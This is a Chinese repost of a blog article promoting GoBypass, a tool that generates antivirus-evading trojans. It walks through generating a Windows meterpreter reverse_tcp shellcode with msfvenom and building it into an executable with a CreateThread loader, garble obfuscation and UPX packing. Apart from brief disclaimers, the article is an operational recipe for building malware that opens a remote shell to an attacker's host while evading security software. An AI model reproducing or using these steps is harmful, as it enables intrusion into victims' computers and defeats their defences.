项目地址:
https://github.com/4ra1n/GoBypass
0x01 免责声明
该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责。
使用参考视频:
在kali中使用msfvenom生成需要的payload(注意使用-f c参数),示例:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c
复制完整C语言格式的shellcode并写入当前目录的shellcode.txt(无需过多处理,内部会对ShellCode进行编码)
在生成免杀马之前请注意以下三件事:
确保安装Golang且环境变量中包含go,否则无法编译
请在当前目录先执行go env -w GO111MODULE=on,然后go mod download命令下载依赖
如果下载依赖过慢,配置镜像go env -w GOPROXY=https://mirrors.aliyun.com/goproxy
一切就绪后就可以开始生成了,示例:
使用CreateThread模块并删除编译信息:
go run main.go -m CreateThread -d
删除编译信息且用garble混淆源码后编译:
go run main.go -m CreateThread -d -g
编译后的可执行文件进行upx加壳:
go run main.go -m CreateThread -d -g -u
可选参数如下:
其中必须的模块参数如下:
尤其感谢Safe6Sec师傅的项目
https://github.com/safe6Sec/GolangBypassAV
https://github.com/Ne0nd0g/go-shellcod
↓↓↓
原文始发于微信公众号(EchoSec):神兵利器 | GoBypass免杀生成工具分享(附下载)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论